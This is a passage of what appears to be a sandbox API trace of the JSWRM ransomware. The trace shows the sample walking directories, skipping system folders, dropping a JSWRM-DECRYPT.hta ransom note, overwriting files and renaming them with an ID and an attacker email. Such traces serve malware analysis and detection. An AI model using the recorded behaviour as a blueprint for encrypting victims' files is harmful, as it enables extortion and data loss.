ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.174] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.174] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="2070", cAlternateFileName="")) returned 1 [0060.174] lstrcmpiW (lpString1="2070", lpString2=".") returned 1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="..") returned 1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="...") returned 1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="windows") returned -1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="recovery") returned -1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="perflogs") returned -1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="documents and settings") returned -1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="$RECYCLE.BIN") returned 1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="system volume information") returned -1 [0060.174] lstrcmpiW (lpString1="2070", lpString2="msocache") returned -1 [0060.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0060.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0060.175] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\2070\\jswrm-decrypt.hta")) returned 0xffffffff [0060.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0060.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0060.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0060.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0060.176] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\2070\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.193] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.193] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.194] CloseHandle (hObject=0x450) returned 1 [0060.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0060.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0060.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0060.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0060.194] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\2070\\jswrm-decrypt.hta")) returned 0x20 [0060.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0060.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.195] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a8a5536, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0060.195] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a8a5536, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0060.195] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.195] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0060.195] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0060.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0060.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0060.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0060.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0060.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0060.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0060.196] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.196] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=4015) returned 1 [0060.196] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfa0) returned 0x23dc88 [0060.196] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xfa0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xfa0, lpOverlapped=0x0) returned 1 [0060.198] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.198] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xfa0, lpOverlapped=0x0) returned 1 [0060.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0060.198] CloseHandle (hObject=0x3d4) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0060.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0060.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.199] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0060.200] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a87f332, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a87f332, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a8a5536, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.200] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0060.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0060.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0060.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0060.200] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.200] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0060.200] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0060.200] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0060.201] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0060.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0060.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0060.201] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.201] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=80254) returned 1 [0060.201] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13970) returned 0x2471a8 [0060.201] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x13970, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x13970, lpOverlapped=0x0) returned 1 [0060.208] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.208] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x13970, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x13970, lpOverlapped=0x0) returned 1 [0060.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.209] CloseHandle (hObject=0x3d4) returned 1 [0060.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0060.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: 